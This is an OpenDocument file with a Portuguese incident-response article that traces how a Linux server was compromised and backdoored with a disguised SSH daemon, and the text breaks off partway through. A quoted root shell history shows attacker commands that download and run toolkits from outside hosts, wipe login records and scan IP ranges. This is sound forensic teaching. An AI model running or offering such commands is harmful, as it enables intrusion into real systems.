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graphics" manifest:full-path="Object 1/"/>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graphics"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Verdana" svg:font-family="Verdana" style:font-family-generic="swiss"/>
    <style:font-face style:name="Bitstream Vera Sans Mono1" svg:font-family="'Bitstream Vera Sans Mono'" style:font-family-generic="modern" style:font-pitch="fixed"/>
    <style:font-face style:name="Bitstream Vera Sans Mono" svg:font-family="'Bitstream Vera Sans Mono'" style:font-adornments="Bold" style:font-family-generic="modern" style:font-pitch="fixed"/>
    <style:font-face style:name="Courier New" svg:font-family="'Courier New'" style:font-family-generic="modern" style:font-pitch="fixed"/>
    <style:font-face style:name="Lucida Console1" svg:font-family="'Lucida Console'" style:font-adornments="Bold" style:font-family-generic="modern" style:font-pitch="fixed"/>
    <style:font-face style:name="Lucida Console" svg:font-family="'Lucida Console'" style:font-adornments="Normal"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svg:font-family="Arial" style:font-adornments="Norm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office:font-face-decls>
  <office:automatic-styles>
    <style:style style:name="P1" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:paragraph-properties fo:text-align="end" style:justify-single-word="false"/>
      <style:text-properties fo:font-style="italic" style:font-style-asian="italic" style:font-style-complex="italic"/>
    </style:style>
    <style:style style:name="P2" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0cm" fo:margin-bottom="0cm" style:line-height-at-least="0.423cm" fo:text-indent="0cm" style:auto-text-indent="false" style:text-autospace="none" style:writing-mode="lr-tb"/>
      <style:text-properties fo:color="#000000" style:font-name="Verdana" fo:font-size="8pt" style:font-name-asian="Verdana" style:font-size-asian="8pt" style:font-name-complex="Verdana" style:font-size-complex="8pt"/>
    </style:style>
    <style:style style:name="P3" style:family="paragraph" style:parent-style-name="Standard">
      <style:paragraph-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0cm" fo:margin-bottom="0cm" style:line-height-at-least="0.423cm" fo:text-indent="0cm" style:auto-text-indent="false" style:text-autospace="none" style:writing-mode="lr-tb"/>
    </style:style>
    <style:style style:name="P4" style:family="paragraph" style:parent-style-name="Text_20_body">
      <style:paragraph-properties fo:break-before="page"/>
    </style:style>
    <style:style style:name="P5" style:family="paragraph" style:parent-style-name="List" style:list-style-name="L1"/>
    <style:style style:name="P6" style:family="paragraph" style:parent-style-name="List" style:list-style-name="L2"/>
    <style:style style:name="P7" style:family="paragraph" style:parent-style-name="List">
      <style:paragraph-properties fo:break-before="page"/>
    </style:style>
    <style:style style:name="T1" style:family="text" style:parent-style-name="Internet_20_link">
      <style:text-properties style:text-underline-style="none"/>
    </style:style>
    <style:style style:name="T2" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties fo:color="#000000" style:font-name="Bitstream Vera Sans Mono1" fo:font-size="8pt" style:font-name-asian="Verdana" style:font-size-asian="8pt" style:font-name-complex="Verdana" style:font-size-complex="8pt"/>
    </style:style>
    <style:style style:name="T3" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties fo:font-size="8pt" style:font-size-asian="8pt" style:font-size-complex="8pt"/>
    </style:style>
    <style:style style:name="T4" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties style:font-name="Bitstream Vera Sans Mono1"/>
    </style:style>
    <style:style style:name="T5" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties fo:font-style="italic" style:font-style-asian="italic" style:font-style-complex="italic"/>
    </style:style>
    <style:style style:name="T6" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties fo:color="#000000" style:font-name="Bitstream Vera Sans Mono1" fo:font-size="8pt" fo:font-style="italic" style:font-name-asian="Verdana" style:font-size-asian="8pt" style:font-style-asian="italic" style:font-name-complex="Verdana" style:font-size-complex="8pt" style:font-style-complex="italic"/>
    </style:style>
    <style:style style:name="T7" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties fo:color="#000000" style:font-name="Bitstream Vera Sans Mono1" fo:font-size="8pt" fo:font-style="normal" style:font-name-asian="Verdana" style:font-size-asian="8pt" style:font-style-asian="normal" style:font-name-complex="Verdana" style:font-size-complex="8pt" style:font-style-complex="normal"/>
    </style:style>
    <style:style style:name="T8" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties fo:color="#ff0000" style:font-name="Bitstream Vera Sans Mono1" fo:font-size="8pt" fo:font-style="normal" style:font-name-asian="Verdana" style:font-size-asian="8pt" style:font-style-asian="normal" style:font-name-complex="Verdana" style:font-size-complex="8pt" style:font-style-complex="normal"/>
    </style:style>
    <style:style style:name="T9" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties fo:color="#0000ff" style:font-name="Bitstream Vera Sans Mono1" fo:font-size="8pt" fo:font-style="normal" style:font-name-asian="Verdana" style:font-size-asian="8pt" style:font-style-asian="normal" style:font-name-complex="Verdana" style:font-size-complex="8pt" style:font-style-complex="normal"/>
    </style:style>
    <style:style style:name="T10" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties style:font-name="Bitstream Vera Sans Mono1" fo:font-size="8pt" style:font-size-asian="8pt" style:font-size-complex="8pt"/>
    </style:style>
    <style:style style:name="T11" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties style:font-name="Bitstream Vera Sans Mono1" fo:font-size="8pt" fo:font-style="italic" style:font-size-asian="8pt" style:font-style-asian="italic" style:font-size-complex="8pt" style:font-style-complex="italic"/>
    </style:style>
    <style:style style:name="T12" style:family="text" style:parent-style-name="ComputerOutput">
      <style:text-properties style:font-name="Bitstream Vera Sans Mono1" fo:font-size="8pt" fo:font-style="normal" style:font-size-asian="8pt" style:font-style-asian="normal" style:font-size-complex="8pt" style:font-style-complex="normal"/>
    </style:style>
    <style:style style:name="T13" style:family="text">
      <style:text-properties fo:color="#0000ff" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color"/>
    </style:style>
    <style:style style:name="fr1" style:family="graphic" style:parent-style-name="Frame">
      <style:graphic-properties style:wrap="none" style:vertical-pos="from-top" style:vertical-rel="paragraph" style:horizontal-pos="center" style:horizontal-rel="paragraph" fo:background-color="#ffffcc" style:background-transparency="0%" fo:padding="0.152cm" fo:border="0.002cm solid #000000">
        <style:background-image/>
        <style:columns fo:column-count="0" fo:column-gap="0cm"/>
      </style:graphic-properties>
    </style:style>
    <style:style style:name="fr2" style:family="graphic" style:parent-style-name="OLE">
      <style:graphic-properties fo:margin-left="0cm" fo:margin-right="0cm" fo:margin-top="0cm" fo:margin-bottom="0cm" style:run-through="foreground" style:wrap="none" style:vertical-pos="from-top" style:vertical-rel="paragraph" style:horizontal-pos="from-left" style:horizontal-rel="paragraph" fo:background-color="#ffffff" style:background-transparency="0%" fo:padding="0.051cm" fo:border="0.002cm solid #000000" style:shadow="none">
        <style:background-image/>
      </style:graphic-properties>
    </style:style>
    <style:style style:name="fr3" style:family="graphic" style:parent-style-name="Frame">
      <style:graphic-properties style:wrap="none" style:vertical-pos="from-top" style:vertical-rel="paragraph" style:horizontal-pos="from-left" style:horizontal-rel="paragraph" fo:background-color="#ffffcc" style:background-transparency="0%" fo:padding="0.152cm" fo:border="0.002cm solid #000000">
        <style:background-image/>
        <style:columns fo:column-count="0" fo:column-gap="0cm"/>
      </style:graphic-properties>
    </style:style>
    <style:style style:name="fr4" style:family="graphic" style:parent-style-name="Frame">
      <style:graphic-properties style:run-through="foreground" style:wrap="none" style:vertical-pos="from-top" style:vertical-rel="paragraph" style:horizontal-pos="center" style:horizontal-rel="paragraph" fo:background-color="#ffffcc" style:background-transparency="0%" fo:padding="0.152cm" fo:border="0.002cm solid #000000">
        <style:background-image/>
        <style:columns fo:column-count="0" fo:column-gap="0cm"/>
      </style:graphic-properties>
    </style:style>
    <style:style style:name="fr5" style:family="graphic" style:parent-style-name="OLE">
      <style:graphic-properties style:vertical-pos="from-top" style:vertical-rel="paragraph" style:horizontal-pos="from-left" style:horizontal-rel="paragraph" fo:background-color="#ffffff" style:background-transparency="100%" fo:padding="0.049cm" fo:border="0.002cm solid #000000" style:shadow="none">
        <style:background-image/>
      </style:graphic-properties>
    </style:style>
    <style:style style:name="Sect1" style:family="section">
      <style:section-properties fo:background-color="#ffffff" text:dont-balance-text-columns="false"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variable-decls>
        <text:variable-decl office:value-type="string" text:name="articleinfo.copyright_0.year_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.copyright_0.holder_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.copyright_1.year_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.copyright_1.holder_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.author_0.firstname_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.author_0.surname_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.author_0.affiliation_0.orgname_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.author_0.affiliation_0.address_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.author_1.firstname_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.author_1.surname_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.author_1.affiliation_0.orgname_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.author_1.affiliation_0.address_0"/>
        <text:variable-decl office:value-type="string" text:name="articleinfo.releaseinfo_0"/>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Document_20_Title">A História de Um Ataque</text:p>
      <text:p text:style-name="Document_20_SubTitle"><text:span text:style-name="T1"/></text:p>
      <text:p text:style-name="P1">Avi Alkalay</text:p>
      <text:p text:style-name="P1">avix@br.ibm.com</text:p>
      <text:p text:style-name="P1">Consultor de Linux, Software Livre, Padrões Abertos e Segurança na IBM Brasil</text:p>
      <text:section text:style-name="Sect1" text:name="Intro">
        <text:p text:style-name="Text_20_body">Qualquer administrador de firewall pode observar em seus logs que uma máquina conectada à Internet não fica um minuto sequer, 24 horas por dia, livre de tentativas de invasão. Tem sempre alguém fazendo um scan, tentando algum tipo estranho de conexão, requisitando URLs inseguras aos webservers, enfim, batendo na porta. Parece que as pessoas têm se protegido bem já que não lembro de ter ouvido histórias detalhadas sobre um ataque efetivamente acontecendo.</text:p>
        <text:p text:style-name="Text_20_body">Tive a oportunidade de analisar um computador que foi invadido e vou relatar aqui as evidências que os crackers deixaram para trás, como as descobrimos, e o que lhes interessava naquela máquina. Vou usar nomes fictícios e mascarar alguns IPs para resguardar a privacidade de todos.</text:p>
        <text:p text:style-name="Text_20_body">Vamos chamar os invasores de crackers, porque hackers somos todos nós que respiramos tecnologia, “fuçadores” (tradução da palavra hacker), exploradores, pessoas curiosas. Somos todos hackers porque usamos nossas mentes poderosas para resolver problemas, ganhar dinheiro licitamente, enfim, fazer o bem. Um cracker por outro lado, usa seu conhecimento para invadir, deteriorar, tirar vantagem, e dar trabalho aos hackers administradores de redes. Um cracker é um mau hacker, e um bom hacker pode impedir a ação de um cracker.</text:p>
        <text:section text:style-name="Sect2" text:name="Rastros">
          <text:h text:style-name="Section_20_Title" text:outline-level="1">Os Rastros Deixados pelo Cracker</text:h>
          <text:p text:style-name="Text_20_body">O servidor em questão era uma máquina de testes internos na empresa A, que em determinado momento foi deslocada para um novo teste conectada à Internet, sem uma reinstalação. Tudo começou quando, poucas semanas após estar conectada à Internet, uma empresa que chamaremos de B, enviou um e-mail para P (provedor do link físico para a máquina atacada) informando que detectou uma tentativa de ataque, e requisitou um retorno. P encaminhou o e-mail para A, e esse continha alguns logs com a prova da tentativa de invasão:</text:p>
          <text:p text:style-name="Text_20_body"/>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr1" draw:name="Logs do report" text:anchor-type="paragraph" svg:y="0cm" fo:min-width="10.804cm" style:rel-width="56%" draw:z-index="0"><draw:text-box fo:min-height="4.496cm"><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">Feb 22 12:36:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">Feb 22 12:36:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">Feb 22 12:36:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">Feb 22 12:36:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">Feb 22 12:36:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">Feb 22 12:36:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">Feb 22 12:36:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">Feb 22 12:36:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T2">Feb 22 12:26:27 sshd[PID]: refused connect from <text:s/>IP.IP.IP.IP</text:span></text:p></draw:text-box></draw:frame></text:p>
          <text:p text:style-name="Text_20_body">Eles mostravam que o IDS (Intrusion Detection System) de B acusou que a máquina atacada (cujo endereço IP está representado por IP.IP.IP.IP) tentou se logar várias vezes sem sucesso em seu serviço SSH (sshd). Reparem que o instante de todas as tentativas, até os segundos, é o mesmo, o que leva a crer que não é um ser humano, e sim algum software que muito rapidamente está testando várias combinações de usuário e senha ao mesmo tempo.</text:p>
          <text:p text:style-name="Text_20_body"/>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr2" draw:name="Object1" text:anchor-type="paragraph" svg:x="4.747cm" svg:y="0.24cm" svg:width="9.559cm" svg:height="3.454cm" draw:z-index="9"><draw:object xlink:href="./Object 1" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/><draw:image xlink:href="./ObjectReplacements/Object 1" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/></draw:frame></text:p>
          <text:p text:style-name="P4">Fui chamado para dar explicações porque havia fornecido informalmente por telefone algumas dicas de como proteger a máquina. Era primeiramente necessário dar subsídios ao provedor P para responder ao e-mail de B, dando uma satisfação formal. Isso é uma atitude de responsabilidade de um bom administrador de rede, e demonstra a preocupação em manter o nível de serviço da Internet o mais alto possível.</text:p>
          <text:p text:style-name="Text_20_body">A máquina foi colocada em quarentena, desligada da Internet e começamos a analisá-la. Tratava-se de um Red Hat Enterprise Linux 3 Update 5. Não estou dizendo que o Red Hat Linux é menos ou mais seguro. Isso não é muito intuitivo de se entender, mas segurança não tem quase nada a ver com o software. Segurança não é um firewall, não é criptografia, nem um conjunto de produtos que tem proteção como objetivo. Segurança é um processo que deve ser seguido conscientemente por administradores de redes. Se um ataque acontece, toda a responsabilidade é do administrador, e não do sistema operacional, seja ele qual for, e do fabricante que for. O administrador precisava agora descobrir como o cracker invadiu para, corajosamente, assumir a falha e não permitir que isso aconteça novamente.</text:p>
          <text:p text:style-name="Text_20_body">Logo no boot da máquina observamos consecutivas mensagens estranhas que não deviam estar lá e que continham o texto “(swap)”. Começamos a analisar o processo de inicialização do sistema, a partir do arquivo <text:span text:style-name="FileName">/etc/inittab</text:span>. Vimos que um dos primeiros scripts que são executados no sistema é o <text:span text:style-name="FileName">/etc/init.d/functions</text:span> e fizemos os seguintes testes:</text:p>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr3" draw:name="rpm" text:anchor-type="paragraph" svg:x="2.286cm" svg:y="1cm" fo:min-width="14.478cm" style:rel-width="76%" draw:z-index="5"><draw:text-box fo:min-height="2.568cm"><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">bash$ rpm -qf /etc/init.d/functions</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">initscripts-7.93.20.EL</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput"/></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">bash$ rpm -V initscripts</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T3">S.5....T c /etc/rc.d/init.d/functions</text:span></text:p></draw:text-box></draw:frame></text:p>
          <text:p text:style-name="Text_20_body"/>
          <text:p text:style-name="Text_20_body">Verificamos que este arquivo faz parte (<text:span text:style-name="Command">rpm -qf</text:span>) do pacote <text:span text:style-name="FileName">initscripts</text:span>, e em seguida testamos sua integridade (<text:span text:style-name="Command">rpm -V</text:span>). Descobrimos que o arquivo foi alterado: o número 5 significa que o MD5 do arquivo mudou, ou, em outras palavras, que o conteúdo do arquivo mudou. O RPM sabe disso comparando o MD5 do arquivo atual no disco, com o MD5 registrado em seu banco de dados no momento da instalação do pacote.</text:p>
          <text:p text:style-name="Text_20_body">Mas o que foi alterado no script <text:span text:style-name="FileName">functions</text:span>?</text:p>
          <text:p text:style-name="Text_20_body">A última linha do script era esta:</text:p>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr1" draw:name="crontabs" text:anchor-type="paragraph" svg:y="1cm" fo:min-width="5.906cm" style:rel-width="31%" draw:z-index="4"><draw:text-box fo:min-height="1.332cm"><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">/usr/bin/crontabs -t1 -X53 -p</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T3"/></text:p></draw:text-box></draw:frame></text:p>
          <text:p text:style-name="Text_20_body"/>
          <text:p text:style-name="Text_20_body">Suspeitamos imediatamente porque o comando <text:span text:style-name="Command">crontab</text:span> não se chama “crontabs”. Confirmamos novamente com o RPM:</text:p>
          <text:p text:style-name="Text_20_body"/>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr1" draw:name="rpmcrontabs" text:anchor-type="paragraph" svg:y="0cm" fo:min-width="10.338cm" style:rel-width="54%" draw:z-index="3"><draw:text-box fo:min-height="1.755cm"><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">bash$ rpm -qf /usr/bin/crontabs</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T4">o ficheiro </text:span><text:span text:style-name="ComputerOutput"><text:span text:style-name="T2">/usr/bin/crontabs</text:span></text:span><text:span text:style-name="T4"> não pertence a nenhum pacote</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T3"/></text:p></draw:text-box></draw:frame></text:p>
          <text:p text:style-name="Text_20_body">Pronto. Estava constatado que esse tal comando <text:span text:style-name="Command">crontabs</text:span> era alienígena e não deveria estar ali. Foi, com certeza, implantado pelo cracker. Mas não paramos aqui. Queríamos saber o que este programa fazia. Como era um binário, tentamos extrair algumas strings dele:</text:p>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr3" draw:name="stringscrontabs" text:anchor-type="paragraph" svg:x="5.948cm" svg:y="0.191cm" fo:min-width="6.493cm" style:rel-width="34%" draw:z-index="2"><draw:text-box fo:min-height="3.025cm"><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">bash$ strings /usr/bin/crontabs</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T5">....linhas omitidas...</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">"smbd -D"</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">"(swapd)" &amp;</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T6">....linhas omitidas...</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T3"/></text:p></draw:text-box></draw:frame></text:p>
          <text:p text:style-name="Text_20_body">Ou seja, era este tal <text:span text:style-name="Command">crontabs</text:span> que mandava para a tela as mensagens com a string “(swap)”. Mas descobrimos outra coisa: o alienígena continha também a string “smbd -D”, que se parece com o nome do serviço do Samba. Nem perdemos tempo usando os comandos <text:span text:style-name="Command">ps</text:span> e <text:span text:style-name="Command">top</text:span> para verificar se um processo chamado <text:span text:style-name="Command">smbd</text:span> estava rodando porque usamos os mesmos <text:span text:style-name="Command">rpm -qf</text:span> e <text:span text:style-name="Command">rpm -V</text:span> para constatar que estes programas também foram modificados pelo cracker. Usamos o utilitário gráfico <text:span text:style-name="Command">ksysguard</text:span> (que não foi modificado) do KDE e pudemos observar um tal processo <text:span text:style-name="Command">smbd -D</text:span> rodando. Chamou a atenção que o <text:span text:style-name="Command">ksysguard</text:span> mostrava todos os processos executando sem seus parâmetros, e somente o <text:span text:style-name="Command">smbd</text:span> apresentava um parâmetro. Não tardou a acharmos um programa chamado “<text:span text:style-name="FileName">/usr/bin/smbd -D</text:span>” (com espaço e parâmetro mesmo), e o RPM novamente nos informou que ele não fazia parte de nenhum pacote. Tratava-se de outro programa do cracker. Fomos lá tentar extrair mais algumas informações sobre este programa:</text:p>
          <text:p text:style-name="Text_20_body"/>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr3" draw:name="stringssmbd" text:anchor-type="paragraph" svg:x="4.636cm" svg:y="0.014cm" fo:min-width="9.947cm" style:rel-width="52%" draw:z-index="1"><draw:text-box fo:min-height="5.988cm"><text:p text:style-name="P2"><text:span text:style-name="ComputerOutput">bash$ strings “/usr/bin/smbd -D”</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T5">....linhas omitidas...</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T7">Received SIGHUP; restarting.</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T7">Generating new %d bit RSA key.</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T7">RSA key generation complete.</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T7"><text:s text:c="2"/>-b bits <text:s text:c="3"/>Size of server RSA key (default: 768 bits)</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T8">By-ICE_4_All ( Hackers Not Allowed! )</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T9">SSH-%d.%d-%.50s</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T9">This server does not support your new ssh version.</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T9">Sent %d bit public key and %d bit host key.</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T9">sshd version %.100s [%.100s]</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T6">....linhas omitidas...</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T3"/></text:p></draw:text-box></draw:frame></text:p>
          <text:p text:style-name="Text_20_body">Omitimos diversas linhas para ser mais didático. A linha vermelha eliminou qualquer dúvida se um cracker havia visitado a máquina ou não. Mas o mais interessante são as linhas azuis, que levaram a crer que o famigerado programa <text:span text:style-name="Command">smbd -D</text:span> era um servidor SSH. O cracker deveria querer isso para manter um backdoor aberto, e poder logar com SSH quando quisesse. Em <text:span text:style-name="FileName">/var/log/messages</text:span> encontramos a evidência final:</text:p>
          <text:p text:style-name="Text_20_body"/>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr1" draw:name="logsmbd" text:anchor-type="paragraph" svg:y="0cm" fo:min-width="11.859cm" style:rel-width="62%" draw:z-index="6"><draw:text-box fo:min-height="2.318cm"><text:p text:style-name="P2"><text:span text:style-name="T4">Feb <text:s/>19 19:24:49 localhost smbd -D: RSA1 key generation succeeded</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T4">Feb <text:s/>19 19:24:50 </text:span><text:span text:style-name="ComputerOutput"><text:span text:style-name="T2">localhost</text:span></text:span><text:span text:style-name="T4"> </text:span><text:span text:style-name="ComputerOutput"><text:span text:style-name="T2">smbd -D</text:span></text:span><text:span text:style-name="T4">: RSA key generation succeeded</text:span></text:p><text:p text:style-name="P2"><text:span text:style-name="T4">Feb <text:s/>19 19:24:51 </text:span><text:span text:style-name="ComputerOutput"><text:span text:style-name="T2">localhost</text:span></text:span><text:span text:style-name="T4"> </text:span><text:span text:style-name="ComputerOutput"><text:span text:style-name="T2">smbd -D</text:span></text:span><text:span text:style-name="T4">: DSA key generation succeeded</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">Feb <text:s/>19 19:24:51 </text:span><text:span text:style-name="ComputerOutput"><text:span text:style-name="T2">localhost</text:span></text:span><text:span text:style-name="T10"> </text:span><text:span text:style-name="ComputerOutput"><text:span text:style-name="T2">smbd -D</text:span></text:span><text:span text:style-name="T10">: <text:s/>succeeded</text:span></text:p></draw:text-box></draw:frame></text:p>
          <text:p text:style-name="Text_20_body">Que são mensagens típicas de um daemon SSH sendo executado pela primeira vez, quando cria suas chaves únicas de criptografia, só que bizarramente emitidas por um suposto programa com nome de Samba, o que não faz sentido algum e é forte indício que há algo errado no sistema. Ou seja, o cracker implantou um backdoor SSH mas com nome mascarado de arquivo e de processo sendo <text:span text:style-name="Command">smbd</text:span>. Desses logs pudemos também estimar a data em que a máquina foi atacada: 19 de fevereiro.</text:p>
          <text:p text:style-name="Text_20_body">Para o cracker poder alterar arquivos e comandos tão importantes do sistema, ele deve ter conseguido acesso de root, e por isso fomos espiar o histórico de comandos executados por este usuário no arquivo <text:span text:style-name="FileName">/root/.bash_history</text:span>, e vimos isto: </text:p>
          <text:p text:style-name="Text_20_body"><draw:frame draw:style-name="fr4" draw:name="history" text:anchor-type="paragraph" svg:y="0cm" fo:min-width="14.478cm" style:rel-width="76%" draw:z-index="7"><draw:text-box fo:min-height="2.318cm"><text:p text:style-name="P3"><text:span text:style-name="T10">bash# less /root/.bash_history</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T11">...linhas omitidas...</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">cd /usr/share/.a</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">wget lamisto.octopis.com/mig.tgz</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">tar xzvf mig.tgz</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">./mig g-u root -n 0</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">./mig -u root -n 0</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">cd /usr/share/.a</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">wget <text:s/>utilservices.iasi.rdsnet.ro/~marianu/flo.tgz</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">tar xzvf flo.tgz</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T11"/></text:p><text:p text:style-name="P3"><text:span text:style-name="T11">...linhas omitidas...</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10"/></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">cd /var/tmp</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">wget djanda.com/get/usr.tar.gz</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">wget djanda.com/get/x.tar.gz</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">tar xfvz usr.tar.gz</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">cd usr</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">chmod +rwxrwxrwx *</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">./crond</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">cd ..</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">tar xfvz x.tar.gz</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">cd x</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">chmod +rwxrwxrwx *</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">mv unix x</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">./x 201.20; ./x 201.21; ./x 201.22; ./x 201.23; ./x 201.24; ./x 201.25; ./x 201.</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">26; ./x 201.27; ./x 201.28; ./x 201.29; ./x 201.30; ./x 201.31; ./x 201.32; ./x</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">201.33; ./x 201.34; ./x 201.35; ./x 201.36; ./x 201.37; ./x 201.38; ./x 201.39;</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">./x 201.40; ./x 201.41; ./x 201.42; ./x 201.43; ./x 201.44; ./x 201.45; ./x 201.</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T10">46; ./x 201.47; ./x 201.48; ./x 201.49; ./x 201.50</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T11"/></text:p><text:p text:style-name="P3"><text:span text:style-name="T11">...linhas omitidas...</text:span></text:p><text:p text:style-name="P3"><text:span text:style-name="T12"/></text:p><text:p text:style-name="P3"><text:span text:style-name="T12">/usr/sbin/adduser scanning</text:span></text:p></draw:text-box></draw:frame>O formato do arquivo não permite saber quando esses comandos foram executados, mas fica evidente que o cracker criou um usuário chamado <text:span text:style-name="FileName">scanning</text:span>, baixou arquivos de certos sites, abriu-os e executou comandos que vieram com eles. Analisamos cada um, e descobrimos que:</text:p>
          <text:list text:style-name="L1">
            <text:list-item>
              <text:p text:style-name="P5">No diretório <text:span text:style-name="FileName">/usr/share/.a</text:span> ele instalou e executou o tal comando <text:span text:style-name="Command">mig</text:span> que aparentemente é um limpador de histórico de login do sistema. Usamos o mesmo comando <text:span text:style-name="Command">strings</text:span> para analisar esse binário. Isso confirmou nossa estimativa da data de ataque pois o comando <text:span text:style-name="Command">last</text:span> (usado para verificar esse histórico) apontou dados inconsistentes por volta de 19 de fevereiro.</text:p>
            </text:list-item>
            <text:list-item>
